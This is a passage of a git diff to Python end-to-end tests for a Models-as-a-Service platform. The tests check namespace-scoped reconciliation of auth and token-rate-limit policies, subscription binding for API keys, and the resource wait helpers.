-            log.info(f"✓ Model {MODEL_NAME} found in /v1/models response")
-
-            # Make inference request to verify everything works
-            log.info(f"Testing inference request with subscription {subscription_name}")
-            r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, timeout=90, subscription=subscription_name)
-            assert r.status_code == 200, f"Expected 200, got {r.status_code}"
-
-            log.info("✓ Cross-namespace Subscription test passed")
+            # MaaSAuthPolicy referencing only MODEL_REF in MODEL_NAMESPACE
+            _apply_cr({
+                "apiVersion": "maas.opendatahub.io/v1alpha1",
+                "kind": "MaaSAuthPolicy",
+                "metadata": {"name": policy_name, "namespace": ns},
+                "spec": {
+                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}],
+                    "subjects": {"groups": [{"name": "system:authenticated"}]},
+                },
+            })
 
+            _wait_reconcile(15)
+
+            auth_name = f"maas-auth-{MODEL_REF}"
+            auth_name_other = f"maas-auth-{other_model_ref}"
+
+            # Verify: policy is reconciled into MODEL_REF's AuthPolicy in MODEL_NAMESPACE
+            auth_policies_reconciled = [x.strip() for x in (_get_cr_annotation("authpolicy", auth_name, MODEL_NAMESPACE, "maas.opendatahub.io/auth-policies") or "").split(",") if x.strip()]
+            assert policy_name in auth_policies_reconciled, (
+                f"MaaSAuthPolicy {policy_name} should be in AuthPolicy {auth_name} in {MODEL_NAMESPACE}, got: {auth_policies_reconciled}"
+            )
+
+            # Verify: MODEL_REF's AuthPolicy in the new namespace does not exist
+            auth_in_other_ns = _get_cr("AuthPolicy", auth_name, other_ns)
+            assert auth_in_other_ns is None, (
+                f"AuthPolicy {auth_name} should NOT exist in {other_ns}"
+            )
+
+            # Verify: other model's AuthPolicy in MODEL_NAMESPACE does not exist
+            auth_other_in_model_ns = _get_cr("AuthPolicy", auth_name_other, MODEL_NAMESPACE)
+            assert auth_other_in_model_ns is None, (
+                f"AuthPolicy {auth_name_other} should NOT exist in {MODEL_NAMESPACE} (policy references MODEL_REF only)"
+            )
+            log.info("✓ MaaSAuthPolicy reconciled into MODEL_REF in MODEL_NAMESPACE only; other AuthPolicies do not exist")
         finally:
-            _delete_cr("MaaSSubscription", subscription_name, policy_namespace)
-            _delete_cr("MaaSAuthPolicy", maas_auth_policy_name, policy_namespace)
-
-    def test_multiple_subscriptions_different_namespaces_same_model(self, policy_namespace, api_key):
+            _delete_cr("MaaSAuthPolicy", policy_name, ns)
+            _delete_cr("MaaSModelRef", MODEL_REF, other_ns)
+            _delete_cr("MaaSModelRef", other_model_ref, MODEL_NAMESPACE)
+            _delete_cr("ExternalModel", "test-backend", other_ns)
+            _delete_cr("ExternalModel", "test-backend", MODEL_NAMESPACE)
+            _delete_namespace(other_ns)
+            _wait_reconcile()
+
+    def test_subscription_model_ref(self):
         """
-        Create multiple MaaSSubscriptions in different namespaces referencing the same model.
-        Verify that they aggregate correctly into a single TokenRateLimitPolicy.
-        Test the deletion bug fix: deleting one subscription should NOT delete the TRLP.
+        Create a new namespace and two MaaSModelRefs: MODEL_REF in the new namespace, and another
+        name in MODEL_NAMESPACE. Create MaaSSubscription referencing MODEL_REF in MODEL_NAMESPACE.
+        Verify it is reconciled into MODEL_REF's TRLP in MODEL_NAMESPACE, and the other two
+        models' TRLPs do not exist.
         """
-        sub1_name = f"multi-ns-sub1-{uuid.uuid4().hex[:6]}"
-        sub2_name = f"multi-ns-sub2-{uuid.uuid4().hex[:6]}"
-        maas_auth_policy_name = f"multi-ns-auth-{uuid.uuid4().hex[:6]}"
-        test_group = f"test-group-{uuid.uuid4().hex[:4]}"
-
-        # Create second subscription namespace
-        sub_namespace2 = f"e2e-ns-sub2-{uuid.uuid4().hex[:6]}"
-        _create_namespace(sub_namespace2)
+        other_ns = f"e2e-modelref-{uuid.uuid4().hex[:6]}"
+        other_model_ref = f"e2e-other-model-{uuid.uuid4().hex[:6]}"
+        sub_name = f"e2e-sub-ref-{uuid.uuid4().hex[:6]}"
+        ns = _ns()
 
+        _create_namespace(other_ns)
         try:
-            log.info(f"Creating two MaaSSubscriptions in different namespaces for same model")
+            # Create ExternalModel CRs in both namespaces
+            _create_external_model("test-backend", other_ns)
+            _create_external_model("test-backend", MODEL_NAMESPACE)
 
-            # Create auth policy first
+            # MaaSModelRef in the new namespace with same name as MODEL_REF
             _apply_cr({
                 "apiVersion": "maas.opendatahub.io/v1alpha1",
-                "kind": "MaaSAuthPolicy",
-                "metadata": {"name": maas_auth_policy_name, "namespace": policy_namespace},
-                "spec": {
-                    "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}],
-                    "subjects": {"groups": [{"name": "system:authenticated"}]},
-                },
+                "kind": "MaaSModelRef",
+                "metadata": {"name": MODEL_REF, "namespace": other_ns},
+                "spec": {"modelRef": {"kind": "ExternalModel", "name": "test-backend", "provider": "test"}},
             })
-
-            # Create first subscription in policy_namespace
+            # MaaSModelRef in MODEL_NAMESPACE with a different name
             _apply_cr({
                 "apiVersion": "maas.opendatahub.io/v1alpha1",
-                "kind": "MaaSSubscription",
-                "metadata": {"name": sub1_name, "namespace": policy_namespace},
-                "spec": {
-                    "owner": {"groups": [{"name": "system:authenticated"}]},
-                    "modelRefs": [
-                        {
-                            "name": MODEL_REF,
-                            "namespace": MODEL_NAMESPACE,
-                            "tokenRateLimits": [{"limit": 100, "window": "1m"}],
-                        }
-                    ],
-                },
+                "kind": "MaaSModelRef",
+                "metadata": {"name": other_model_ref, "namespace": MODEL_NAMESPACE},
+                "spec": {"modelRef": {"kind": "ExternalModel", "name": "test-backend", "provider": "test"}},
             })
 
-            # Create second subscription in sub_namespace2
+            # MaaSSubscription referencing only MODEL_REF in MODEL_NAMESPACE
             _apply_cr({
                 "apiVersion": "maas.opendatahub.io/v1alpha1",
                 "kind": "MaaSSubscription",
-                "metadata": {"name": sub2_name, "namespace": sub_namespace2},
+                "metadata": {"name": sub_name, "namespace": ns},
                 "spec": {
-                    "owner": {"groups": [{"name": test_group}]},
+                    "owner": {"groups": [{"name": "system:authenticated"}]},
                     "modelRefs": [
-                        {
-                            "name": MODEL_REF,
-                            "namespace": MODEL_NAMESPACE,
-                            "tokenRateLimits": [{"limit": 200, "window": "1m"}],
-                        }
+                        {"name": MODEL_REF, "namespace": MODEL_NAMESPACE, "tokenRateLimits": [{"limit": 100, "window": "1m"}]},
                     ],
                 },
             })
 
-            # Wait for reconciliation
-            time.sleep(RECONCILE_WAIT)
-
-            # Wait for AuthPolicy to be enforced (subscription needs auth to work)
-            auth_policy_name = f"maas-auth-{MODEL_REF}"
-            log.info(f"Waiting for AuthPolicy {auth_policy_name} to be enforced...")
-            enforced = _wait_for_authpolicy_enforced(auth_policy_name, MODEL_NAMESPACE, timeout=60)
-            assert enforced, f"AuthPolicy {auth_policy_name} not enforced within timeout"
+            _wait_reconcile(15)
 
-            # Verify TokenRateLimitPolicy exists in model namespace
             trlp_name = f"maas-trlp-{MODEL_REF}"
-            trlp = _get_cr("TokenRateLimitPolicy", trlp_name, MODEL_NAMESPACE)
-            assert trlp is not None, "Aggregated TokenRateLimitPolicy should exist"
-
-            # Test model listing endpoint
-            log.info(f"Testing /v1/models with subscription {sub1_name}")
-            r = _list_models(api_key, MODEL_REF, MODEL_NAMESPACE, subscription=sub1_name)
-            assert r.status_code == 200, f"Model listing failed: {r.status_code}"
-            models_data = r.json()
-            model_ids = [m.get("id") for m in models_data.get("data", [])]
-            assert MODEL_NAME in model_ids, f"Expected model {MODEL_NAME} not in list: {model_ids}"
-
-            # Make inference request to verify it works
-            r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, timeout=90, subscription=sub1_name)
-            assert r.status_code == 200, f"Expected 200, got {r.status_code}"
-
-            # Delete the FIRST subscription (not the last one)
-            log.info(f"Deleting first subscription {sub1_name} (should NOT delete TRLP)")
-            _delete_cr("MaaSSubscription", sub1_name, policy_namespace)
-            time.sleep(RECONCILE_WAIT)
-
-            # Verify TRLP still exists (bug fix: it should NOT be deleted)
-            trlp_after = _get_cr("TokenRateLimitPolicy", trlp_name, MODEL_NAMESPACE)
-            assert trlp_after is not None, \
-                "TokenRateLimitPolicy should still exist after deleting first subscription"
-
-            # Inference should still work (use default simulator-subscription since sub1 was deleted)
-            log.info("Testing inference with default simulator-subscription after deleting sub1")
-            r = _poll_status(api_key, MODEL_REF, MODEL_NAMESPACE, 200, timeout=60, subscription="simulator-subscription")
-            assert r.status_code == 200, "Inference should still work after deleting first subscription"
-
-            # Delete the LAST test subscription
-            log.info(f"Deleting last test subscription {sub2_name}")
-            _delete_cr("MaaSSubscription", sub2_name, sub_namespace2)
-            time.sleep(RECONCILE_WAIT)
-
-            # Verify TRLP still exists if there are other MaaSSubscriptions for this model
-            # (like the pre-existing simulator-subscription)
-            trlp_final = _get_cr("TokenRateLimitPolicy", trlp_name, MODEL_NAMESPACE)
-            # Note: TRLP may still exist due to pre-existing subscriptions (e.g. simulator-subscription)
-            # The key test was that deleting the FIRST subscription didn't delete the TRLP
-            log.info(f"TokenRateLimitPolicy exists after deleting test subscriptions: {trlp_final is not None}")
-
-            log.info("✓ Multiple subscriptions deletion test passed (bug fix verified)")
-
-        finally:
-            _delete_cr("MaaSSubscription", sub1_name, policy_namespace)
-            _delete_cr("MaaSSubscription", sub2_name, sub_namespace2)
-            _delete_cr("MaaSAuthPolicy", maas_auth_policy_name, policy_namespace)
-            _delete_namespace(sub_namespace2)
-
-
-class TestAuthorizationBoundary:
-    """Test that namespace boundaries provide proper authorization isolation."""
-
-    def test_model_isolation_between_namespaces(self, policy_namespace):
-        """
-        Verify that policies in one namespace cannot accidentally affect models
-        in other namespaces unless explicitly configured.
-        """
-        # This is more of a design verification test
-        # The key security property: MaaSAuthPolicy in namespace A can only affect
-        # models that it explicitly lists with their namespaces in spec.modelRefs
-
-        # If a policy doesn't list a model, it shouldn't affect it
-        # This is enforced by the controller only creating AuthPolicies for
-        # models explicitly listed in spec.modelRefs[]
-
-        policy_name = f"isolated-policy-{uuid.uuid4().hex[:6]}"
-        unmanaged_model_name = f"unmanaged-model-{uuid.uuid4().hex[:6]}"
-
-        # Create a temporary test model that won't be referenced by the policy
-        _apply_cr({
-            "apiVersion": "maas.opendatahub.io/v1alpha1",
-            "kind": "MaaSModelRef",
-            "metadata": {"name": unmanaged_model_name, "namespace": MODEL_NAMESPACE},
-            "spec": {
-                "modelRef": {"kind": "ExternalModel", "name": "test-backend"}
-            }
-        })
-
-        # Create a policy that only targets MODEL_REF (not the temporary model)
-        _apply_cr({
-            "apiVersion": "maas.opendatahub.io/v1alpha1",
-            "kind": "MaaSAuthPolicy",
-            "metadata": {"name": policy_name, "namespace": policy_namespace},
-            "spec": {
-                "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}],
-                "subjects": {"groups": [{"name": "system:authenticated"}]},
-            },
-        })
-
-        try:
-            time.sleep(RECONCILE_WAIT)
-
-            # Verify that this policy ONLY created AuthPolicy for the specified model
-            auth_policy_name = f"maas-auth-{MODEL_REF}"
-            auth_policy = _get_cr("AuthPolicy", auth_policy_name, MODEL_NAMESPACE)
-            assert auth_policy is not None, "AuthPolicy should exist for specified model"
-
-            # Negative test: Verify NO Kuadrant resources created for unmanaged model
-            unmanaged_auth_policy = _get_cr("AuthPolicy", f"maas-auth-{unmanaged_model_name}", MODEL_NAMESPACE)
-            assert unmanaged_auth_policy is None, \
-                f"AuthPolicy should NOT exist for unmanaged model {unmanaged_model_name}"
-
-            log.info(f"✓ Verified no AuthPolicy created for unmanaged model {unmanaged_model_name}")
-            log.info("✓ Authorization boundary test passed - policies only affect listed models")
-
+            trlp_name_other = f"maas-trlp-{other_model_ref}"
+
+            # Verify: subscription is reconciled into MODEL_REF's TRLP in MODEL_NAMESPACE
+            subscriptions_in_model_ns = [x.strip() for x in (_get_cr_annotation("tokenratelimitpolicy", trlp_name, MODEL_NAMESPACE, "maas.opendatahub.io/subscriptions") or "").split(",") if x.strip()]
+            assert sub_name in subscriptions_in_model_ns, (
+                f"MaaSSubscription {sub_name} should be in TRLP {trlp_name} in {MODEL_NAMESPACE}, got: {subscriptions_in_model_ns}"
+            )
+
+            # Verify: MODEL_REF's TRLP in the new namespace does not exist
+            trlp_in_other_ns = _get_cr("tokenratelimitpolicy", trlp_name, other_ns)
+            assert trlp_in_other_ns is None, (
+                f"TokenRateLimitPolicy {trlp_name} should NOT exist in {other_ns}"
+            )
+
+            # Verify: other model's TRLP in MODEL_NAMESPACE does not exist
+            trlp_other_in_model_ns = _get_cr("tokenratelimitpolicy", trlp_name_other, MODEL_NAMESPACE)
+            assert trlp_other_in_model_ns is None, (
+                f"TokenRateLimitPolicy {trlp_name_other} should NOT exist in {MODEL_NAMESPACE} (subscription references MODEL_REF only)"
+            )
+            log.info("✓ MaaSSubscription reconciled into MODEL_REF in MODEL_NAMESPACE only; other TRLPs do not exist")
         finally:
-            _delete_cr("MaaSAuthPolicy", policy_name, policy_namespace)
-            _delete_cr("MaaSModelRef", unmanaged_model_name, MODEL_NAMESPACE)
+            _delete_cr("MaaSSubscription", sub_name, ns)
+            _delete_cr("MaaSModelRef", MODEL_REF, other_ns)
+            _delete_cr("MaaSModelRef", other_model_ref, MODEL_NAMESPACE)
+            _delete_cr("ExternalModel", "test-backend", other_ns)
+            _delete_cr("ExternalModel", "test-backend", MODEL_NAMESPACE)
+            _delete_namespace(other_ns)
+            _wait_reconcile()
diff --git a/test/e2e/tests/test_subscription.py b/test/e2e/tests/test_subscription.py
index 3dce7cdad..65ad4553d 100644
--- a/test/e2e/tests/test_subscription.py
+++ b/test/e2e/tests/test_subscription.py
@@ -4,6 +4,29 @@
 Tests auth enforcement (MaaSAuthPolicy) and rate limiting (MaaSSubscription)
 by hitting the gateway with API keys created via the MaaS API.
 
+Policy Evaluation Order:
+  1. AuthPolicy (Kuadrant) - FIRST LINE OF DEFENSE
+     - Validates API key via /internal/v1/api-keys/validate
+     - Validates subscription selection via /v1/subscriptions/select
+       * Checks subscription exists and user has access (groups/users match)
+       * Inference uses API keys only; each key carries the bound MaaSSubscription from mint
+     - Denies invalid requests with 403 Forbidden (subscription validation failures)
+     - Injects auth.identity.selected_subscription for downstream policies
+
+  2. TokenRateLimitPolicy (Kuadrant) - RATE LIMITING ONLY
+     - Trusts auth.identity.selected_subscription (already validated by AuthPolicy)
+     - Applies rate limits based on selected subscription
+     - Returns 429 Too Many Requests only when rate limit exceeded
+     - Does NOT re-validate subscription (AuthPolicy already did this)
+
+Expected Error Codes:
+  - 401 Unauthorized: Missing or invalid API key
+  - 403 Forbidden: Valid API key but subscription validation failed
+    * Subscription bound on the key no longer exists or is invalid
+    * No subscriptions available for user
+  - 429 Too Many Requests: Valid request but rate limit exceeded
+  - 200 OK: Valid request with available rate limit quota
+
 Requires:
   - GATEWAY_HOST env var (e.g. maas.apps.cluster.example.com)
   - MAAS_API_BASE_URL env var (e.g. https://maas.apps.cluster.example.com/maas-api)
@@ -13,7 +36,6 @@
 Environment variables (all optional, with defaults):
   - GATEWAY_HOST: Gateway hostname (required)
   - MAAS_API_BASE_URL: MaaS API URL (required for API key creation)
-  - DEPLOYMENT_NAMESPACE: MaaS API and Controller namespace (default: opendatahub)
   - MAAS_SUBSCRIPTION_NAMESPACE: MaaS CRs namespace (default: models-as-a-service)
   - E2E_TEST_TOKEN_SA_NAMESPACE, E2E_TEST_TOKEN_SA_NAME: When set, use this SA token
     instead of oc whoami -t (e.g. for Prow where oc whoami -t is unavailable)
@@ -26,10 +48,16 @@
   - E2E_PREMIUM_MODEL_REF: Premium model ref for CRs (default: premium-simulated-simulated-premium)
   - E2E_UNCONFIGURED_MODEL_REF: Unconfigured model ref (default: e2e-unconfigured-facebook-opt-125m-simulated)
   - E2E_UNCONFIGURED_MODEL_PATH: Path to unconfigured model (default: /llm/e2e-unconfigured-facebook-opt-125m-simulated)
+  - E2E_DISTINCT_MODEL_REF: First distinct model ref for multi-model tests (default: e2e-distinct-simulated)
+  - E2E_DISTINCT_MODEL_PATH: Path to first distinct model (default: /llm/e2e-distinct-simulated)
+  - E2E_DISTINCT_MODEL_ID: Model ID served by first distinct model (default: test/e2e-distinct-model)
+  - E2E_DISTINCT_MODEL_2_REF: Second distinct model ref for multi-model tests (default: e2e-distinct-2-simulated)
+  - E2E_DISTINCT_MODEL_2_PATH: Path to second distinct model (default: /llm/e2e-distinct-2-simulated)
+  - E2E_DISTINCT_MODEL_2_ID: Model ID served by second distinct model (default: test/e2e-distinct-model-2)
   - E2E_SIMULATOR_SUBSCRIPTION: Free-tier subscription (default: simulator-subscription)
   - E2E_PREMIUM_SIMULATOR_SUBSCRIPTION: Premium-tier subscription (default: premium-simulator-subscription)
   - E2E_SIMULATOR_ACCESS_POLICY: Simulator auth policy name (default: simulator-access)
-  - E2E_INVALID_SUBSCRIPTION: Invalid subscription name for 429 test (default: nonexistent-sub)
+  - E2E_INVALID_SUBSCRIPTION: Invalid subscription name for 403 test (default: nonexistent-sub)
 """
 
 import base64
@@ -61,6 +89,12 @@
 MODEL_NAMESPACE = os.environ.get("E2E_MODEL_NAMESPACE", "llm")
 UNCONFIGURED_MODEL_REF = os.environ.get("E2E_UNCONFIGURED_MODEL_REF", "e2e-unconfigured-facebook-opt-125m-simulated")
 UNCONFIGURED_MODEL_PATH = os.environ.get("E2E_UNCONFIGURED_MODEL_PATH", "/llm/e2e-unconfigured-facebook-opt-125m-simulated")
+DISTINCT_MODEL_REF = os.environ.get("E2E_DISTINCT_MODEL_REF", "e2e-distinct-simulated")
+DISTINCT_MODEL_PATH = os.environ.get("E2E_DISTINCT_MODEL_PATH", "/llm/e2e-distinct-simulated")
+DISTINCT_MODEL_ID = os.environ.get("E2E_DISTINCT_MODEL_ID", "test/e2e-distinct-model")
+DISTINCT_MODEL_2_REF = os.environ.get("E2E_DISTINCT_MODEL_2_REF", "e2e-distinct-2-simulated")
+DISTINCT_MODEL_2_PATH = os.environ.get("E2E_DISTINCT_MODEL_2_PATH", "/llm/e2e-distinct-2-simulated")
+DISTINCT_MODEL_2_ID = os.environ.get("E2E_DISTINCT_MODEL_2_ID", "test/e2e-distinct-model-2")
 SIMULATOR_SUBSCRIPTION = os.environ.get("E2E_SIMULATOR_SUBSCRIPTION", "simulator-subscription")
 PREMIUM_SIMULATOR_SUBSCRIPTION = os.environ.get(
     "E2E_PREMIUM_SIMULATOR_SUBSCRIPTION", "premium-simulator-subscription"
@@ -166,29 +200,35 @@ def _create_sa_token(sa_name, namespace=None, duration="10m"):
 # API Key Management Helpers
 # ---------------------------------------------------------------------------
 
-def _create_api_key(oc_token: str, name: str = None) -> str:
+def _create_api_key(oc_token: str, name: str = None, subscription: str = None) -> str:
     """Create an API key using the MaaS API and return the plaintext key.
     
     Note: API keys inherit the authenticated user's groups automatically.
     Users can only create keys for themselves with their own groups.
-    
+    Pass ``subscription`` to bind a specific MaaSSubscription at mint time.
+
     Args:
         oc_token: OC token for authentication with maas-api
         name: Optional name for the key (auto-generated if not provided)
-    
+        subscription: Optional MaaSSubscription name to bind (highest-priority auto-bind if omitted)
+
     Returns:
         The plaintext API key (sk-oai-xxx format)
     """
     url = f"{_maas_api_url()}/v1/api-keys"
     key_name = name or f"e2e-sub-test-{uuid.uuid4().hex[:8]}"
-    
+
+    body = {"name": key_name}
+    if subscription:
+        body["subscription"] = subscription
+
     r = requests.post(
         url,
         headers={
             "Authorization": f"Bearer {oc_token}",
             "Content-Type": "application/json",
         },
-        json={"name": key_name},
+        json=body,
         timeout=TIMEOUT,
         verify=TLS_VERIFY,
     )
@@ -200,7 +240,7 @@ def _create_api_key(oc_token: str, name: str = None) -> str:
     if not api_key:
         raise RuntimeError(f"API key response missing 'key' field: {data}")
     
-    log.info(f"Created API key '{key_name}' (inherits user's groups)")
+    log.info(f"Created API key '{key_name}' (inherits user's groups), bound to subscription '{subscription}'")
     return api_key
 
 
@@ -233,7 +273,11 @@ def _get_default_api_key() -> str:
     pid = os.getpid()
     if pid not in _default_api_key_cache:
         oc_token = _get_cluster_token()
-        _default_api_key_cache[pid] = _create_api_key(oc_token, name="e2e-default-key")
+        _default_api_key_cache[pid] = _create_api_key(
+            oc_token,
+            name="e2e-default-key",
+            subscription=SIMULATOR_SUBSCRIPTION,
+        )
     return _default_api_key_cache[pid]
 
 
@@ -253,10 +297,29 @@ def _delete_cr(kind, name, namespace=None):
 
 def _get_cr(kind, name, namespace=None):
     namespace = namespace or _ns()
-    result = subprocess.run(["oc", "get", kind, name, "-n", namespace, "-o", "json"], capture_output=True, text=True)
-    if result.returncode != 0:
+    max_retries = 3
+    retry_delay = 2
+
+    for attempt in range(max_retries):
+        result = subprocess.run(["oc", "get", kind, name, "-n", namespace, "-o", "json"], capture_output=True, text=True)
+
+        if result.returncode == 0:
+            return json.loads(result.stdout)
+
+        # Retry transient errors
+        if attempt < max_retries - 1 and _is_transient_kubectl_error(result.stderr):
+            log.warning(
+                f"Transient kubectl error getting {kind}/{name} (attempt {attempt + 1}/{max_retries}): {result.stderr.strip()}"
+            )
+            time.sleep(retry_delay * (attempt + 1))
+            continue
+
+        # Non-transient error or final attempt - return None (existing behavior)
+        log.error(
+            f"Failed to get {kind}/{name} in namespace '{namespace}' after {max_retries} retries. "
+            f"Last error: {result.stderr.strip()}"
+        )
         return None
-    return json.loads(result.stdout)
 
 
 def _cr_exists(kind, name, namespace=None):
@@ -336,7 +399,7 @@ def _sa_to_user(sa_name, namespace=None):
     return f"system:serviceaccount:{namespace}:{sa_name}"
 
 
-def _create_test_maas_model(name, llmis_name="facebook-opt-125m-simulated", llmis_namespace="llm", namespace=None):
+def _create_test_maas_model(name, llmis_name=MODEL_REF, llmis_namespace=MODEL_NAMESPACE, namespace=None):
     """Create a MaaSModelRef CR for testing.
 
     Note: MaaSModelRef can only reference backend models (LLMInferenceService) in the same namespace.
@@ -392,7 +455,16 @@ def _create_test_auth_policy(name, model_refs, users=None, groups=None, namespac
     })
 
 
-def _create_test_subscription(name, model_refs, users=None, groups=None, token_limit=100, window="1m", namespace=None):
+def _create_test_subscription(
+    name,
+    model_refs,
+    users=None,
+    groups=None,
+    token_limit=100,
+    window="1m",
+    namespace=None,
+    priority=None,
+):
     """Create a MaaSSubscription CR for testing.
 
     Args:
@@ -403,6 +475,7 @@ def _create_test_subscription(name, model_refs, users=None, groups=None, token_l
         token_limit: Token rate limit (default: 100)
         window: Rate limit window (default: "1m")
         namespace: Namespace for the subscription (defaults to _ns())
+        priority: Optional spec.priority (higher wins for default API key binding when omitted)
     """
     namespace = namespace or _ns()
     if not isinstance(model_refs, list):
@@ -411,65 +484,44 @@ def _create_test_subscription(name, model_refs, users=None, groups=None, token_l
     # Convert groups list to required format: [{"name": "group1"}, {"name": "group2"}]
     groups_formatted = [{"name": g} for g in (groups or [])]
 
-    log.info("Creating MaaSSubscription: %s", name)
-    _apply_cr({
-        "apiVersion": "maas.opendatahub.io/v1alpha1",
-        "kind": "MaaSSubscription",
-        "metadata": {"name": name, "namespace": namespace},
-        "spec": {
-            "owner": {
-                "users": users or [],
-                "groups": groups_formatted
-            },
-            "modelRefs": [{
+    spec = {
+        "owner": {
+            "users": users or [],
+            "groups": groups_formatted,
+        },
+        "modelRefs": [
+            {
                 "name": ref,
                 "namespace": MODEL_NAMESPACE,
-                "tokenRateLimits": [{"limit": token_limit, "window": window}]
-            } for ref in model_refs]
-        }
-    })
-
+                "tokenRateLimits": [{"limit": token_limit, "window": window}],
+            }
+            for ref in model_refs
+        ],
+    }
+    if priority is not None:
+        spec["priority"] = int(priority)
 
-def _subscription_for_path(path):
-    """Return the X-MaaS-Subscription value for a given model path."""
-    path = path or MODEL_PATH
-    if path == PREMIUM_MODEL_PATH:
-        return PREMIUM_SIMULATOR_SUBSCRIPTION
-    if path == MODEL_PATH:
-        return SIMULATOR_SUBSCRIPTION
-    return None  # e.g. unconfigured model has no subscription
+    log.info("Creating MaaSSubscription: %s", name)
+    _apply_cr(
+        {
+            "apiVersion": "maas.opendatahub.io/v1alpha1",
+            "kind": "MaaSSubscription",
+            "metadata": {"name": name, "namespace": namespace},
+            "spec": spec,
+        }
+    )
 
 
-def _inference(api_key_or_token, path=None, extra_headers=None, subscription=None):
-    """Make an inference request using an API key or Bearer token.
-    
-    Args:
-        api_key_or_token: API key (sk-oai-xxx) or Bearer token for authorization
-        path: Model path (default: MODEL_PATH)
-        extra_headers: Additional headers to include
-        subscription: Subscription name, False to omit, or None to auto-detect
-    """
+def _inference(api_key, path=None, extra_headers=None, model_name=None):
+    """POST completions using an API key only (subscription is bound at mint)."""
     path = path or MODEL_PATH
     url = f"{_gateway_url()}{path}/v1/completions"
-    headers = {"Authorization": f"Bearer {api_key_or_token}", "Content-Type": "application/json"}
-    # Add X-MaaS-Subscription: extra_headers overrides; else explicit subscription; else infer from path.
-    # Pass subscription=False to explicitly omit the header (e.g. when testing no-subscription case).
-    sub_header = "x-maas-subscription"
-    if extra_headers and sub_header in extra_headers:
-        pass  # extra_headers will set it
-    elif subscription is False:
-        pass  # explicitly omit
-    elif subscription is not None:
-        headers[sub_header] = subscription
-    else:
-        inferred = _subscription_for_path(path)
-        if inferred:
-            headers[sub_header] = inferred
+    headers = {"Authorization": f"Bearer {api_key}", "Content-Type": "application/json"}
     if extra_headers:
         headers.update(extra_headers)
     return requests.post(
         url, headers=headers,
-        json={"model": MODEL_NAME, "prompt": "Hello", "max_tokens": 3},
+        json={"model": model_name or MODEL_NAME, "prompt": "Hello", "max_tokens": 3},
         timeout=TIMEOUT, verify=TLS_VERIFY,
     )
 
@@ -515,7 +567,124 @@ def _wait_for_maas_model_ready(name, namespace=None, timeout=120):
     )
 
 
-def _poll_status(token, expected, path=None, extra_headers=None, subscription=None, timeout=None, poll_interval=2):
+def _wait_for_maas_auth_policy_ready(name, namespace=None, timeout=60):
+    """Wait for MaaSAuthPolicy to reach Active phase with enforced AuthPolicies.
+
+    Args:
+        name: Name of the MaaSAuthPolicy
+        namespace: Namespace (defaults to _ns())
+        timeout: Maximum wait time in seconds (default: 60)
+
+    Raises:
+        TimeoutError: If MaaSAuthPolicy doesn't become Active/enforced within timeout
+    """
+    namespace = namespace or _ns()
+    deadline = time.time() + timeout
+    log.info(f"Waiting for MaaSAuthPolicy {name} to become Active (timeout: {timeout}s)...")
+
+    while time.time() < deadline:
+        cr = _get_cr("maasauthpolicy", name, namespace)
+        if cr:
+            phase = cr.get("status", {}).get("phase")
+            auth_policies = cr.get("status", {}).get("authPolicies", [])
+
+            # Check if all auth policies are accepted and enforced
+            all_enforced = all(
+                ap.get("accepted") == "True" and ap.get("enforced") == "True"
+                for ap in auth_policies
+            )
+
+            if phase == "Active" and auth_policies and all_enforced:
+                log.info(f"✅ MaaSAuthPolicy {name} is Active and enforced")
+                return
+            log.debug(f"MaaSAuthPolicy {name} phase: {phase}, authPolicies: {len(auth_policies)}, all_enforced: {all_enforced}")
+        time.sleep(2)
+
+    # Timeout - log current state for debugging
+    cr = _get_cr("maasauthpolicy", name, namespace)
+    current_phase = cr.get("status", {}).get("phase") if cr else "not found"
+    auth_policies = cr.get("status", {}).get("authPolicies", []) if cr else []
+    raise TimeoutError(
+        f"MaaSAuthPolicy {name} did not become Active/enforced within {timeout}s "
+        f"(current phase: {current_phase}, authPolicies: {len(auth_policies)})"
+    )
+
+
+def _wait_for_maas_subscription_ready(name, namespace=None, timeout=30):
+    """Wait for MaaSSubscription to reach Active phase.
+
+    Args:
+        name: Name of the MaaSSubscription
+        namespace: Namespace (defaults to _ns())
+        timeout: Maximum wait time in seconds (default: 30)
+
+    Raises:
+        TimeoutError: If MaaSSubscription doesn't become Active within timeout
+    """
+    namespace = namespace or _ns()
+    deadline = time.time() + timeout
+    log.info(f"Waiting for MaaSSubscription {name} to become Active (timeout: {timeout}s)...")
+
+    while time.time() < deadline:
+        cr = _get_cr("maassubscription", name, namespace)
+        if cr:
+            phase = cr.get("status", {}).get("phase")
+            if phase == "Active":
+                log.info(f"✅ MaaSSubscription {name} is Active")
+                return
+            log.debug(f"MaaSSubscription {name} phase: {phase}")
+        time.sleep(2)
+
+    # Timeout - log current state for debugging
+    cr = _get_cr("maassubscription", name, namespace)
+    current_phase = cr.get("status", {}).get("phase") if cr else "not found"
+    raise TimeoutError(
+        f"MaaSSubscription {name} did not become Active within {timeout}s (current phase: {current_phase})"
+    )
+
+
+def _wait_for_token_rate_limit_policy(model_ref, model_namespace="llm", timeout=60):
+    """Wait for TokenRateLimitPolicy to be created and enforced for a model.
+
+    Args:
+        model_ref: Name of the model (e.g., "e2e-distinct-simulated")
+        model_namespace: Namespace where the TRLP should be created (default: "llm")
+        timeout: Maximum wait time in seconds (default: 60)
+
+    Raises:
+        TimeoutError: If TRLP isn't created and enforced within timeout
+    """
+    trlp_name = f"maas-trlp-{model_ref}"
+    deadline = time.time() + timeout
+    log.info(f"Waiting for TokenRateLimitPolicy {trlp_name} in {model_namespace} (timeout: {timeout}s)...")
+
+    while time.time() < deadline:
+        result = subprocess.run(
+            ["oc", "get", "tokenratelimitpolicy", trlp_name, "-n", model_namespace, "-o", "json"],
+            capture_output=True, text=True
+        )
+        if result.returncode == 0:
+            try:
+                trlp = json.loads(result.stdout)
+                conditions = trlp.get("status", {}).get("conditions", [])
+                # Check if TRLP is enforced
+                enforced = next((c for c in conditions if c.get("type") in ["Enforced", "Ready"]), None)
+                if enforced and enforced.get("status") == "True":
+                    log.info(f"✅ TokenRateLimitPolicy {trlp_name} is enforced")
+                    return
+                log.debug(f"TokenRateLimitPolicy {trlp_name} exists but not enforced yet")
+            except (json.JSONDecodeError, KeyError) as e:
+                log.debug(f"Failed to parse TRLP status: {e}")
+        else:
+            log.debug(f"TokenRateLimitPolicy {trlp_name} not found yet...")
+        time.sleep(3)
+
+    raise TimeoutError(
